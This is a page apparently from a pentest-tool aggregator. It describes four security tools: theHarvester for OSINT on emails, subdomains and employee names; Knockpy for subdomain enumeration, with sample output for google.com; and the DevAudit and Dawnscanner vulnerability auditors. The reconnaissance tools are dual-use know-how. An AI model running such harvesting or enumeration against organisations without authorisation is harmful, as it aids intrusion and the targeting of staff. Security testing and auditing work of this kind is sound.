Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5854 articles
Browse latest View live

theHarvester v3.0.3 - E-mails, Subdomains And Names Harvester (OSINT)

$
0
0

theHarvester is a tool for gathering subdomain names, e-mail addresses, virtual hosts, open ports/ banners, and employee names from different public sources (search engines, pgp key servers).
Is a really simple tool, but very effective for the early stages of a penetration test or just to know the visibility of your company in the Internet.

The sources are:

Passive:
  • threatcrowd: Open source threat intelligence - https://www.threatcrowd.org/
  • crtsh: Comodo Certificate search - www.crt.sh
  • google: google search engine - www.google.com (With optional google dorking)
  • googleCSE: google custom search engine
  • google-profiles: google search engine, specific search for Google profiles
  • bing: microsoft search engine - www.bing.com
  • bingapi: microsoft search engine, through the API (you need to add your Key in the discovery/bingsearch.py file)
  • dogpile: Dogpile search engine - www.dogpile.com
  • pgp: pgp key server - mit.edu
  • linkedin: google search engine, specific search for Linkedin users
  • vhost: Bing virtual hosts search
  • twitter: twitter accounts related to an specific domain (uses google search)
  • googleplus: users that works in target company (uses google search)
  • yahoo: Yahoo search engine
  • baidu: Baidu search engine
  • shodan: Shodan Computer search engine, will search for ports and banner of the discovered hosts (http://www.shodanhq.com/)
  • hunter: Hunter search engine (you need to add your Key in the discovery/huntersearch.py file)
  • google-certificates: Google Certificate Transparency report

Active:
  • DNS brute force: this plugin will run a dictionary brute force enumeration
  • DNS reverse lookup: reverse lookup of ip´s discovered in order to find hostnames
  • DNS TDL expansion: TLD dictionary brute force enumeration

Modules that need API keys to work:
  • googleCSE: You need to create a Google Custom Search engine(CSE), and add your Google API key and CSE ID in the plugin (discovery/googleCSE.py)
  • shodan: You need to provide your API key in discovery/shodansearch.py (one provided at the moment)
  • hunter: You need to provide your API key in discovery/huntersearch.py (none is provided at the moment)

Dependencies:

Changelog in 3.0.0:
  • Subdomain takeover checks
  • Port scanning (basic)
  • Improved DNS dictionary
  • Shodan DB search fixed
  • Result storage in Sqlite

Comments? Bugs? Requests?
cmartorella@edge-security.com



    Knock v.4.1.1 - Subdomain Scan

    $
    0
    0

    Knockpy is a python tool designed to enumerate subdomains on a target domain through a wordlist. It is designed to scan for DNS zone transfer and to try to bypass the wildcard DNS record automatically if it is enabled. Now knockpy supports queries to VirusTotal subdomains, you can setting the API_KEY within the config.json file.

    Very simply
    $ knockpy domain.com
    Export full report in JSON
    If you want to save full log like this one just type:
    $ knockpy domain.com --json

    Install
    Prerequisites
    • Python 2.7.6
    Dependencies
    • Dnspython
    $ sudo apt-get install python-dnspython
    Installing
    $ git clone https://github.com/guelfoweb/knock.git

    $ cd knock

    $ nano knockpy/config.json <- set your virustotal API_KEY

    $ sudo python setup.py install
    Note that it's recommended to use Google DNS: 8.8.8.8 and 8.8.4.4


    Knockpy arguments
    $ knockpy -h
    usage: knockpy [-h] [-v] [-w WORDLIST] [-r] [-c] [-j] domain

    ___________________________________________

    knock subdomain scan
    knockpy v.4.1
    Author: Gianni 'guelfoweb' Amato
    Github: https://github.com/guelfoweb/knock
    ___________________________________________

    positional arguments:
    domain target to scan, like domain.com

    optional arguments:
    -h, --help show this help message and exit
    -v, --version show program's version number and exit
    -w WORDLIST specific path to wordlist file
    -r, --resolve resolve ip or domain name
    -c, --csv save output in csv
    -f, --csvfields add fields name to the first row of csv output file
    -j, --json export full report in JSON

    example:
    knockpy domain.com
    knockpy domain.com -w wordlist.txt
    knockpy -r domain.com or IP
    knockpy -c domain.com
    knockpy -j domain.com
    For virustotal subdomains support you can setting your API_KEY in the config.json file.


    Example
    Subdomain scan with internal wordlist
    $ knockpy domain.com
    Subdomain scan with external wordlist
    $ knockpy domain.com -w wordlist.txt
    Resolve domain name and get response headers
    $ knockpy -r domain.com [or IP]
    + checking for virustotal subdomains: YES
    [
    "partnerissuetracker.corp.google.com",
    "issuetracker.google.com",
    "r5---sn-ogueln7k.c.pack.google.com",
    "cse.google.com",

    .......too long.......

    "612.talkgadget.google.com",
    "765.talkgadget.google.com",
    "973.talkgadget.google.com"
    ]
    + checking for wildcard: NO
    + checking for zonetransfer: NO
    + resolving target: YES
    {
    "zonetransfer": {
    "enabled": false,
    "list": []
    },
    "target": "google.com",
    "hostname": "google.com",
    "virustotal": [
    "partnerissuetracker.corp.google.com",
    "issuetracker.google.com",
    "r5---sn-ogueln7k.c.pack.google.com",
    "cse.google.com",
    "mt0.google.com",
    "earth.google.com",
    "clients1.google.com",
    "pki.google.com",
    "www.sites.google.com",
    "appengine.google.com",
    "fcmatch.google.com",
    "dl.google.com",
    "translate.google.com",
    "feedproxy.google.com",
    "hangouts.google.com",
    "news.google.com",

    .......too long.......

    "100.talkgadget.google.com",
    "services.google.com",
    "301.talkgadget.google.com",
    "857.talkgadget.google.com",
    "600.talkgadget.google.com",
    "992.talkgadget.google.com",
    "93.talkgadget.google.com",
    "storage.cloud.google.com",
    "863.talkgadget.google.com",
    "maps.google.com",
    "661.talkgadget.google.com",
    "325.talkgadget.google.com",
    "sites.google.com",
    "feedburner.google.com",
    "support.google.com",
    "code.google.com",
    "562.talkgadget.google.com",
    "190.talkgadget.google.com",
    "58.talkgadget.google.com",
    "612.talkgadget.google.com",
    "765.talkgadget.google.com",
    "973.talkgadget.google.com"
    ],
    "alias": [],
    "wildcard": {
    "detected": {},
    "test_target": "eqskochdzapjbt.google.com",
    "enabled": false,
    "http_response": {}
    },
    "ipaddress": [
    "216.58.205.142"
    ],
    "response_time": "0.0351989269257",
    "http_response": {
    "status": {
    "reason": "Found",
    "code": 302
    },
    "http_headers": {
    "content-length": "256",
    "location": "http://www.google.it/?gfe_rd=cr&ei=60WIWdmnDILCXoKbgfgK",
    "cache-control": "private",
    "date": "Mon, 07 Aug 2017 10:50:19 GMT",
    "referrer-policy": "no-referrer",
    "content-type": "text/html; charset=UTF-8"
    }
    }
    }
    Save scan output in CSV
    $ knockpy -c domain.com
    Export full report in JSON
    $ knockpy -j domain.com

    Talk about
    Ethical Hacking and Penetration Testing Guide Book by Rafay Baloch.
    Knockpy comes pre-installed on the following security distributions for penetration test:

    Other
    This tool is currently maintained by Gianni 'guelfoweb' Amato, who can be contacted at guelfoweb@gmail.com or twitter @guelfoweb. Suggestions and criticism are welcome.


    DevAudit - Open-source, Cross-Platform, Multi-Purpose Security Auditing Tool

    $
    0
    0

    DevAudit is an open-source, cross-platform, multi-purpose security auditing tool targeted at developers and teams adopting DevOps and DevSecOps that detects security vulnerabilities at multiple levels of the solution stack. DevAudit provides a wide array of auditing capabilities that automate security practices and implementation of security auditing in the software development life-cycle. DevAudit can scan your operating system and application package dependencies, application and application server configurations, and application code, for potential vulnerabilities based on data aggregated by providers like OSS Index and Vulners from a wide array of sources and data feeds such as the National Vulnerability Database (NVD) CVE data feed, the Debian Security Advisories data feed, Drupal Security Advisories, and many others.

    DevAudit helps developers address at least 4 of the OWASP Top 10 risks to web application development:
    as well as risks classified by MITRE in the CWE dictionary such as CWE-2 Environment and CWE-200 Information Disclosure


    As development progresses and its capabilities mature, DevAudit will be able to address the other risks on the OWASP Top 10 and CWE lists like Injection and XSS. With the focus on web and cloud and distributed multi-user applications, software development today is increasingly a complex affair with security issues and potential vulnerabilities arising at all levels of the stack developers rely on to deliver applications. The goal of DevAudit is to provide a platform for automating implementation of development security reviews and best practices at all levels of the solution stack from library package dependencies to application and server configuration to source code.

    Features
    • Cross-platform with a Docker image also available. DevAudit runs on Windows and Linux with *BSD and Mac and ARM Linux support planned. Only an up-to-date version of .NET or Mono is required to run DevAudit. A DevAudit Docker image can also be pulled from Docker Hub and run without the need to install Mono.
    • CLI interface. DevAudit has a CLI interface with an option for non-interactive output and can be easily integrated into CI build pipelines or as post-build command-line tasks in developer IDEs. Work on integration of the core audit library into IDE GUIs has already begun with the Audit.Net Visual Studio extension.
    • Continuously updated vulnerabilties data. DevAudit uses backend data providers like OSS Index and Vulners which provide continuously updated vulnerabilities data compiled from a wide range of security data feeds and sources such as the NVD CVE feeds, Drupal Security Advisories, and so on. Support for additional vulnerability and package data providers like vFeed and Libraries.io will be added.
    • Audit operating system and development package dependencies. DevAudit audits Windows applications and packages installed via Windows MSI, Chocolatey, and OneGet, as well as Debian, Ubuntu, and CentOS Linux packages installed via Dpkg, RPM and YUM, for vulnerabilities reported for specific versions of the applications and packages. For development package dependencies and libraries DevAudit audits NuGet v2 dependencies for .NET, Yarn/NPM and Bower dependencies for nodejs, and Composer package dependencies for PHP. Support for other package managers for different languages is added regularly.
    • Audit application server configurations. DevAudit audits the server version and the server configuration for the OpenSSH sshd, Apache httpd, MySQL/MariaDB, PostgreSQL, and Nginx servers with many more coming. Configuration auditing is based on the Alpheus library and is done using full syntactic analysis of the server configuration files. Server configuration rules are stored in YAML text files and can be customized to the needs of developers. Support for many more servers and applications and types of analysis like database auditing is added regularly.
    • Audit application configurations. DevAudit audits Microsoft ASP.NET applications and detects vulnerabilities present in the application configuration. Application configuration rules are stored in YAML text files and can be customized to the needs of developers. Application configuration auditing for applications like Drupal and WordPress and DNN CMS is coming.
    • Audit application code by static analysis. DevAudit currently supports static analysis of .NET CIL bytecode. Analyzers reside in external script files and can be fully customized based on the needs of the developer. Support for C# source code analysis via Roslyn, PHP7 source code and many more languages and external static code analysis tools is coming.
    • Remote agentless auditing. DevAudit can connect to remote hosts via SSH with identical auditing features available in remote environments as in local environments. Only a valid SSH login is required to audit remote hosts and DevAudit running on Windows can connect to and audit Linux hosts over SSH. On Windows DevAudit can also remotely connect to and audit other Windows machines using WinRM.
    • Agentless Docker container auditing. DevAudit can audit running Docker containers from the Docker host with identical features available in container environments as in local environments.
    • GitHub repository auditing. DevAudit can connect directly to a project repository hosted on GitHub and perform package source and application configuration auditing.
    • PowerShell support. DevAudit can also be run inside the PowerShell system administration environment as cmdlets. Work on PowerShell support is paused at present but will resume in the near future with support for cross-platform Powershell both on Windows and Linux.

    Requirements
    DevAudit is a .NET 4.6 application. To install locally on your machine you will need either the Microsoft .NET Framework 4.6 runtime on Windows, or Mono 4.4+ on Linux. .NET 4.6 should be already installed on most recent versions of Windows, if not then it is available as a Windows feature that can be turned on or installed from the Programs and Features control panel applet on consumer Windows, or from the Add Roles and Features option in Server Manager on server versions of Windows. For older versions of Windows, the .NET 4.6 installer from Microsoft can be found here.
    On Linux the minimum version of Mono supported is 4.4. Although DevAudit runs on Mono 4 (with one known issue) it's recommended that Mono 5 be installed. Mono 5 brings many improvements to the build and runtime components of Mono that benefit DevAudit.
    The existing Mono packages provided by your distro are probably not Mono 5 as yet, so you will have to install Mono packages manually to be able to use Mono 5. Installation instructions for the most recent packages provided by the Mono project for several major Linux distros are here. It is recommended you have the mono-devel package installed as this will reduce the chances of missing assemblies.
    Alternatively on Linux you can use the DevAudit Docker image if you do not wish to install Mono and already have Docker installed on your machine.

    Installation
    DevAudit can be installed by the following methods:
    • Building from source.
    • Using a binary release archive file downloaded from Github for Windows or Linux.
    • Using the release MSI installer downloaded from Github for Windows.
    • Using the Chocolatey package manager on Windows.
    • Pulling the ossindex/devaudit image from Docker Hub on Linux.

    Building from source on Linux
    1. Pre-requisites: Mono 4.4+ (Mono 5 recommended) and the mono-devel package which provides the compiler and other tools needed for building Mono apps. Your distro should have packages for at least Mono version 4.4 and above, otherwise manual installation instructions for the most recent packages provided by the Mono project for several major Linux distros are here
    2. Clone the DevAudit repository from https://github.com/OSSIndex/DevAudit.git
    3. Run the build.sh script in the root DevAudit directory. DevAudit should compile without any errors.
    4. Run ./devaudit --help and you should see the DevAudit version and help screen printed.
    Note that NuGet on Linux may occasionally exit with Error: NameResolutionFailure which seems to be a transient problem contacting the servers that contain the NuGet packages. You should just run ./build.sh again until the build completes normally.

    Building from source on Windows
    1. Pre-requisites: You must have one of:
    2. Clone the DevAudit repository from https://github.com/OSSIndex/DevAudit.git
    3. From a visual Studio 2015 or ,NETRun the build.cmd script in the root DevAudit directory. DevAudit should compile without any errors.
    4. Run ./devaudit --help and you should see the DevAudit version and help screen printed.

    Installing from the release archive files on Windows on Linux
    1. Pre-requisites: You must have Mono 4.4+ on Linux or .NET 4.6 on Windows.
    2. Download the latest release archive file for Windows or Linux from the project releases page. Unpack this file to a directory.
    3. From the directory where you unpacked the release archive run devaudit --help on Windows or ./devaudit --help on Linux. You should see the version and help screen printed.
    4. (Optional) Add the DevAudit installation directory to your PATH environment variable

    Installing using the MSI Installer on Windows
    The MSI installer for a release can be found on the Github releases page.
    1. Click on the releases link near the top of the page.
    2. Identify the release you would like to install.
    3. A "DevAudit.exe" link should be visible for each release that has a pre-built installer.
    4. Download the file and execute the installer. You will be guided through a simple installation.
    5. Open a new command prompt or PowerShell window in order to have DevAudit in path.
    6. Run DevAudit.

    Installing using Chocolatey on Windows
    DevAudit is also available on Chocolatey.
    1. Install Chocolatey.
    2. Open an admin console or PowerShell window.
    3. Type choco install devaudit
    4. Run DevAudit.

    Installing using Docker on Linux
    Pull the Devaudit image from Docker Hub: docker pull ossindex/devaudit. The image tagged ossindex/devaudit:latest (which is the default image that is downloaded) is built from the most recent release while ossindex/devaudit:unstable is built on the master branch of the source code and contains the newest additions albeit with less testing.

    Concepts

    Audit Target
    Represents a logical group of auditing functions. DevAudit currently supports the following audit targets:
    • Package Source. A package source manages application and library dependencies using a package manager. Package managers install, remove or update applications and library dependencies for an operating system like Debian Linux, or for a development language or framework like .NET or nodejs. Examples of package sources are dpkg, yum, Chocolatey, Composer, and Bower. DevAudit audits the names and versions of installed packages against vulnerabilities reported for specific versions of those packages.
    • Application. An application like Drupal or a custom application built using a framework like ASP.NET. DevAudit audits applications and application modules and plugins against vulnerabilities reported for specific versions of application binaries and modules and plugins. DevAudit can also audit application configurations for known vulnerabilities, and perform static analysis on application code looking for known weaknesses.
    • Application Server. Application servers provide continuously running services or daemons like a web or database server for other applications to use, or for users to access services like authentication. Examples of application servers are the OpenSSH sshd and Apache httpd servers. DevAudit can audit application server binaries, modules and plugins against vulnerabilities reported for specific versions as well as audit server configurations for known server configuration vulnerabilities and weaknesses.

    Audit Environment
    Represents a logical environment where audits against audit targets are executed. Audit environments abstract the I/O and command executions required for an audit and allow identical functions to be performed against audit targets on whatever physical or network location the target's files and executables are located. The follwing environments are currently supported :
    • Local. This is the default audit environment where audits are executed on the local machine.
    • SSH. Audits are executed on a remote host connected over SSH. It is not necessary to have DevAudit installed on the remote host.
    • WinRM. Audits are executed on a remote Windows host connected over WinRM. It is not necessary to have DevAudit installed on the remote host.
    • Docker. Audits are executed on a running Docker container. It is not necessary to have DevAudit installed on the container image.
    • GitHub. Audits are executed on a GitHub project repository's file-system directly. It is not necessary to checkout or download the project locally to perform the audit.

    Audit Options
    These are different options that can be enabled for the audit. You can specify options that apply to the DevAudit program for example, to run in non-interactive mode, as well as options that apply to the target e.g if you set the AppDevMode option for auditing ASP.NET applications to true then certain audit rules will not be enabled.

    Basic Usage
    The CLI is the primary interface to the DevAudit program and is suitable both for interactive use and for non-interactive use in scheduled tasks, shell scripts, CI build pipelines and post-build tasks in developer IDEs. The basic DevAudit CLI syntax is:
    devaudit TARGET [ENVIRONMENT] | [OPTIONS]
    where TARGET specifies the audit target ENVIRONMENT specifies the audit environment and OPTIONS specifies the options for the audit target and environment. There are 2 ways to specify options: program options and general audit options that apply to more than one target can be specified directly on the command-line as parameters . Target-specific options can be specified with the -o options using the format: -o OPTION1=VALUE1,OPTION2=VALUE2,.... with commas delimiting each option key-value pair.
    If you are piping or redirecting the program output to a file then you should always use the -n --non-interactive option to disable any interactive user interface features and animations.
    When specifying file paths, an @ prefix before a path indicates to DevAudit that this path is relative to the root directory of the audit target e.g if you specify: -r c:\myproject -b @bin\Debug\app2.exe DevAudit considers the path to the binary file as c:\myproject\bin\Debug\app2.exe.

    Audit Targets

    Package Sources
    • msi Do a package audit of the Windows Installer MSI package source on Windows machines.
    • choco Do a package audit of packages installed by the Choco package manager.
    • oneget Do a package audit of the system OneGet package source on Windows.
    • nuget Do a package audit of a NuGet v2 package source. You must specify the location of the NuGet packages.config file you wish to audit using the -f or --file option otherwise the current directory will be searched for this file.
    • bower Do a package audit of a Bower package source. You must specify the location of the Bower packages.json file you wish to audit using the -f or --file option otherwise the current directory will be searched for this file.
    • composer Do a package audit of a Composer package source. You must specify the location of the Composer composer.json file you wish to audit using the -f or --file option otherwise the current directory will be searched for this file.
    • dpkg Do a package audit of the system dpkg package source on Debian Linux and derivatives.
    • rpm Do a package audit of the system RPM package source on RedHat Linux and derivatives.
    • yum Do a package audit of the system Yum package source on RedHat Linux and derivatives.
    For every package source the following general audit options can be used:
    • -f --file Specify the location of the package manager configuration file if needed. The NuGet, Bower and Composer package sources require this option.
    • --list-packages Only list the packages in the package source scanned by DevAudit.
    • --list-artifacts Only list the artifacts found on OSS Index for packages scanned by DevAudit.
    Package sources tagged [Experimental] are only available in the master branch of the source code and may have limited back-end OSS Index support. However you can always list the packages scanned and artifacts available on OSS Index using the list-packages and list-artifacts options.

    Applications
    • aspnet Do an application audit on a ASP.NET application. The relevant options are:
      • -r --root-directory Specify the root directory of the application. This is just the top-level application directory that contains files like Global.asax and Web.config.
      • -b --application-binary Specify the application binary. The is the .NET assembly that contains the application's .NET bytecode. This file is usually a .DLL and located in the bin sub-folder of the ASP.NET application root directory.
      • -c --configuration-file or -o AppConfig=configuration-file Specifies the ASP.NET application configuration file. This file is usually named Web.config and located in the application root directory. You can override the default @Web.config value with this option.
      • -o AppDevMode=enabled Specifies that application development mode should be enabled for the audit. This mode can be used when auditing an application that is under development. Certain configuration rules that are tagged as disabled for AppDevMode (e.g running the application in ASP.NET debug mode) will not be enabled during the audit.
    • netfx Do an application audit on a .NET application. The relevant options are:
      • -r --root-directory Specify the root directory of the application. This is just the top-level application directory that contains files like App.config.
      • -b --application-binary Specify the application binary. The is the .NET assembly that contains the application's .NET bytecode. This file is usually a .DLL and located in the bin sub-folder of the ASP.NET application root directory.
      • -c --configuration-file or -o AppConfig=configuration-file Specifies the .NET application configuration file. This file is usually named App.config and located in the application root directory. You can override the default @App.config value with this option.
      • -o GendarmeRules=RuleLibrary Specifies that the Gendarme static analyzer should enabled for the audit with rules from the specified rules library used. For example: devaudit netfx -r /home/allisterb/vbot-debian/vbot.core -b @bin/Debug/vbot.core.dll --skip-packages-audit -o GendarmeRules=Gendarme.Rules.Naming will run the Gendarme static analyzer on the vbot.core.dll assembly using rules from Gendarme.Rules.Naming library. The complete list of rules libraries is (taken from the Gendarme wiki):
    • drupal7 Do an application audit on a Drupal 7 application.
      • -r --root-directory Specify the root directory of the application. This is just the top-level directory of your Drupal 7 install.
    • drupal8 Do an application audit on a Drupal 8 application.
      • -r --root-directory Specify the root directory of the application. This is just the top-level directory of your Drupal 8 install.
    All applications also support the following common options for auditing the application modules or plugins:
    • --list-packages Only list the application plugins or modules scanned by DevAudit.
    • --list-artifacts Only list the artifacts found on OSS Index for application plugins and modules scanned by DevAudit.
    • --skip-packages-audit Only do an appplication configuration or code analysis audit and skip the packages audit.

    Application Servers
    • sshd Do an application server audit on an OpenSSH sshd-compatible server.
    • httpd Do an application server audit on an Apache httpd-compatible server.
    • mysql Do an application server audit on a MySQL-compatible server (like MariaDB or Oracle MySQL.)
    • nginx Do an application server audit on a Nginx server.
    • pgsql Do an application server audit on a PostgreSQL server.
    This is an example command line for an application server audit: ./devaudit httpd -i httpd-2.2 -r /usr/local/apache2/ -c @conf/httpd.conf -b @bin/httpd which audits an Apache Httpd server running on a Docker container named httpd-2.2.
    The following are audit options common to all application servers:
    • -r --root-directory Specifies the root directory of the server. This is just the top-level of your server filesystem and defaults to / unless you want a different server root.
    • -c --configuration-file Specifies the server configuration file. e.g in the above audit the Apache configuration file is located at /usr/local/apache2/conf/httpd.conf. If you don't specify the configuration file DevAudit will attempt to auto-detect the configuration file for the server selected.
    • -b --application-binary Specifies the server binary. e.g in the above audit the Apache binary is located at /usr/local/apache2/bin/httpd. If you don't specify the binary path DevAudit will attempt to auto-detect the server binary for the server selected.
    Application servers also support the following common options for auditing the server modules or plugins:
    • --list-packages Only list the application plugins or modules scanned by DevAudit.
    • --list-artifacts Only list the artifacts found on OSS Index for application plugins and modules scanned by DevAudit.
    • --skip-packages-audit Only do a server configuration audit and skip the packages audit.

    Environments
    There are currently 5 audit environment supported: local, remote hosts over SSH, remote hosts over WinRM, Docker containers, and GitHub. Local environments are used by default when no other environment options are specified.

    SSH
    The SSH environment allows audits to be performed on any remote hosts accessible over SSH without requiring DevAudit to be installed on the remote host. SSH environments are cross-platform: you can connect to a Linux remote host from a Windows machine running DevAudit. An SSH environment is created by the following options:-s SERVER [--ssh-port PORT] -u USER [-k KEYFILE] [-p | --password-text PASSWORD]
    -s SERVER Specifies the remote host or IP to connect to via SSH.
    -u USER Specifies the user to login to the server with.
    --ssh-port PORT Specifies the port on the remote host to connect to. The default is 22.
    -k KEYFILE Specifies the OpenSSH compatible private key file to use to connect to the remote server. Currently only RSA or DSA keys in files in the PEM format are supported.
    -p Provide a prompt with local echo disabled for interactive entry of the server password or key file passphrase.
    --password-text PASSWORD Specify the user password or key file passphrase as plaintext on the command-line. Note that on Linux when your password contains special characters you should use enclose the text on the command-line using single-quotes like 'MyPa<ss' to avoid the shell interpreting the special characters.

    WinRM
    The WinRM environment allows audits to be performed on any remote Windows hosts accessible over WinRM without requiring DevAudit to be installed on the remote host. WinRM environments are currently only available on Windows machines running DevAudit. A WinRM environment is created by the following options:-w IP -u USER [-p | --password-text PASSWORD]
    -w IP Specifies the remote IP to connect to via WinRM.
    -u USER Specifies the user to login to the server with.
    -p Provide a prompt with local echo disabled for interactive entry of the server password or key file passphrase.
    --password-text PASSWORD Specify the server password or key file passphrase as plaintext on the command-line.

    Docker
    This section discusses how to audit Docker images using DevAudit installed on the local machine. For running DevAudit as a containerized Docker app see the section below on Docker Usage.
    A Docker audit environment is specified by the following option: -i CONTAINER_NAME | -i CONTAINER_ID



    CONTAINER_(NAME|ID) Specifes the name or id of a running Docker container to connect to. The container must be already running as DevAudit does not know how to start the container with the name or the state you require.

    GitHub
    The GitHub audit environment allows audits to be performed directly on a GitHub project repository. A GitHub environment is created by the -g option: -g "Owner=OWNER,Name=NAME,Branch=BRANCH"
    OWNER Specifies the owner of the project
    NAME Specifies the name of the project
    PATH Specifies the branch of the project to connect to
    You can use the -r, -c, and -f options as usual to specify the path to file-system files and directories required for the audit. e.g the following commad: devaudit aspnet -g "Owner=Dnnsoftware,Name=Dnn.Platforn,Branch=Release/9.0.2" -r /Website -c@web.config will do an ASP.NET audit on this repository https://github.com/dnnsoftware/Dnn.Platform/ using the /Website source folder as the root directory and the web.config file as the ASP.NET configuration file. Note that filenames are case-sensitive in most environments.


    Program Options
    -n --non-interactive Run DevAudit in non-interactive mode with all interactive features and animations of the CLI disabled. This mode is necessary for running DevAudit in shell scripts for instance otherwise errors will occure when DevAudit attempts to use interactive console features.
    -d --debug Run DevAudit in debug mode. This will print a variety of informational and diagnostic messages. This mode is used for troubleshooting DevAudit errors and bugs.

    Docker Usage
    DevAudit also ships as a Docker containerized app which allows users on Linux to run DevAudit without the need to install Mono and build from source. To pull the DevAudit Docker image from Docker Hub:
    docker pull ossindex/devaudit[:label]
    The current images are about 131 MB compressed. By default the image labelled latest is pulled which is the most recent release of the program. An unstable image is also available which tracks the master branch of the source code. To run DevAudit as a containerized app:
    docker run -i -t ossindex/devaudit TARGET [ENVIRONMENT] | [OPTIONS]
    The -i and -t Docker options are necessary for running DevAudit interactively. If you don't specify these options then you must run DevAudit in non-interactive mode by using the DevAudit option -n.
    You must mount any directories on the Docker host machine that DevAudit needs to access on the DevAudit Docker container using the Docker -v option. If you mount your local root directory at a mount point named /hostroot on the Docker image then DevAudit can access files and directories on your local machine using the same local paths. For example:
    docker run -i -t -v /:/hostroot:ro ossindex/devaudit netfx -r /home/allisterb/vbot-debian/vbot.core
    will allow the DevAudit Docker container to audit the local directory /home/allisterb/vbot-debian/vbot.core. You must mount your local root in this way to audit other Docker containers from the DevAudit container e.g.
    docker run -i -t -v /:/hostroot:ro ossindex/devaudit mysql -i myapp1 -r / -c /etc/my.cnf --skip-packages-audit
    will run a MySQL audit on a Docker container named myapp1 from the ossindex/devaudit container.
    If you do not need to mount your entire root directory then you can mount just the directory needed for the audit. For example:
    docker run -i -t -v /home/allisterb/vbot-debian/vbot.core:/vbot:ro ossindex/devaudit netfx -r /vbot -b @bin/Debug/vbot.core.dll
    will mount read-only the /home/allisterb/vbot-debian/vbot.core directory as /vbot on the DevAudit container which allows DevAudit to access it as the audit root directory for a netfx application audit at /vbot.
    If you wish to use private key files on the local Docker host for an audit over SSH, you can mount your directory that contains the needed key file and then tell DevAudit to use that file path e.g.
    docker -i -t -v /home/allisterb/.ssh:/ssh:ro run ossindex/devaudit dpkg -s localhost -u allisterb -p -k /ssh/mykey.key
    will mount the directory containing key files at /ssh and allow the DevAudit container to use them.
    Note that it's currently not possible for the Docker container to audit operating system package sources like dpkg or rpm or application servers like OpenSSH sshd on the local Docker host without mounting your local root directory at /hostroot as described above. DevAudit must chroot into your local root directory from the Docker container when running executables like dpkg or server binaries like sshd and httpd. You must also mount your local root as described above to audit other Docker containers from the DevAudit container as DevAudit also needs to chroot into your local root to execute local Docker commands to communicate with your other containers.
    For running audits over SSH from the DevAudit container it is not necessary to mount the local root at /hostroot.

    Troubleshooting
    If you encounter a bug or other issue with DevAudit there are a couple of things you can enable to help us resolve it:
    • Use the -d option to enable debugging output. Diagnostic information will be emitted during the audit run.
    • On Linux use the DEVAUDIT_TRACE variable to enable tracing program execution. The value of this variable must be in the format for Mono tracing e.g you can set DEVAUDIT_TRACE=N:DevAudit.AuditLibrary to trace all the calls made to the audit library duing an audit.

    Known Issues
    • On Windows you must use the -n --non-interactive program option when piping or redirecting program output to a file otherwise a crash will result. This behaviour may be changed in the future to make non-interactive mode the default.
    • There appears to be an issue using the Windows console app ConEmu and the Cygwin builds of the OpenSSH client when SSHing into remote Linux hosts to run Mono apps. If you run DevAudit this way you may notice strange sequences appearing sometimes at the end of console output. You may also have problems during keyboard interactive entry like entering passwords for SSH audits where the wrong password appears to be sent. If you are having problems entering passwords for SSH audits using ConEmu when working remotely, try holding the backspace key for a second or two to clear the input buffer before entering your password.


    Dawnscanner - Dawn Is A Static Analysis Security Scanner For Ruby Written Web Applications (Sinatra, Padrino And ROR Frameworks)

    $
    0
    0

    dawnscanner is a source code scanner designed to review your ruby code for security issues.
    dawnscanner is able to scan plain ruby scripts (e.g. command line applications) but all its features are unleashed when dealing with web applications source code. dawnscanner is able to scan major MVC (Model View Controller) frameworks, out of the box:

    Quick update from November, 2018
    As you can see dawnscanner is on hold since more then an year. Sorry for that. It's life. I was overwhelmed by tons of stuff and I dedicated free time to Offensive Security certifications. True to be told, I'm starting OSCE journey really soon.
    The dawnscanner project will be updated soon with new security checks and kickstarted again.
    Paolo

    dawnscanner version 1.6.6 has 235 security checks loaded in its knowledge base. Most of them are CVE bulletins applying to gems or the ruby interpreter itself. There are also some check coming from Owasp Ruby on Rails cheatsheet.

    An overall introduction
    When you run dawnscanner on your code it parses your project Gemfile.lock looking for the gems used and it tries to detect the ruby interpreter version you are using or you declared in your ruby version management tool you like most (RVM, rbenv, ...).
    Then the tool tries to detect the MVC framework your web application uses and it applies the security check accordingly. There checks designed to match rails application or checks that are appliable to any ruby code.
    dawnscanner can also understand the code in your views and to backtrack sinks to spot cross site scripting and sql injections introduced by the code you actually wrote. In the project roadmap this is the code most of the future development effort will be focused on.
    dawnscanner security scan result is a list of vulnerabilities with some mitigation actions you want to follow in order to build a stronger web application.

    Installation
    You can install latest dawnscanner version, fetching it from Rubygems by typing:
    $ gem install dawnscanner 
    If you want to add dawn to your project Gemfile, you must add the following:
    group :development do
    gem 'dawnscanner', :require=>false
    end
    And then upgrade your bundle
    $ bundle install
    You may want to build it from source, so you have to check it out from github first:
    $ git clone https://github.com/thesp0nge/dawnscanner.git
    $ cd dawnscanner
    $ bundle install
    $ rake install
    And the dawnscanner gem will be built in a pkg directory and then installed on your system. Please note that you have to manage dependencies on your own this way. It makes sense only if you want to hack the code or something like that.

    Usage
    You can start your code review with dawnscanner very easily. Simply tell the tool where the project root directory.
    Underlying MVC framework is autodetected by dawnscanner using target Gemfile.lock file. If autodetect fails for some reason, the tool will complain about it and you have to specify if it's a rails, sinatra or padrino web application by hand.
    Basic usage is to specify some optional command line option to fit best your needs, and to specify the target directory where your code is stored.
    $ dawn [options] target
    In case of need, there is a quick command line option reference running dawn -h at your OS prompt.
    $ dawn -h
    Usage: dawn [options] target_directory

    Examples:
    $ dawn a_sinatra_webapp_directory
    $ dawn -C the_rails_blog_engine
    $ dawn -C --json a_sinatra_webapp_directory
    $ dawn --ascii-tabular-report my_rails_blog_ecommerce
    $ dawn --html -F my_report.html my_rails_blog_ecommerce

    -G, --gem-lock force dawn to scan only for vulnerabilities affecting dependencies in Gemfile.lock (DEPRECATED)
    -d, --dependencies force dawn to scan only for vulnerabilities affecting dependencies in Gemfile.lock

    Reporting

    -a, --ascii-tabular-report cause dawn to format findings using tables in ascii art (DEPRECATED)
    -j, --json cause dawn to format findings using json
    -K, --console cause dawn to format findings using plain ascii text
    -C, --count-only dawn will only count vulnerabilities (useful for scripts)
    -z, --exit-on-warn dawn will return number of found vulnerabilities as exit code
    -F, --file filename tells dawn to write output to filename
    -c, --config-file filename tells dawn to load configuration from filename

    Disable security check family

    --disable-cve-bulletins disable all CVE security checks
    --disable-code-quality disable all code quality checks
    --disable-code-style disable all code style checks
    --disable-owasp-ror-cheatsheet disable all Owasp Ruby on Rails cheatsheet checks
    --disable-owasp-top-10 disable all Owasp Top 10 checks

    Flags useful to query Dawn

    -S, --search-knowledge-base [check_name] search check_name in the knowledge base
    --list-knowledge-base list knowledge-base content
    --list-known-families list security check families contained in dawn's knowledge base
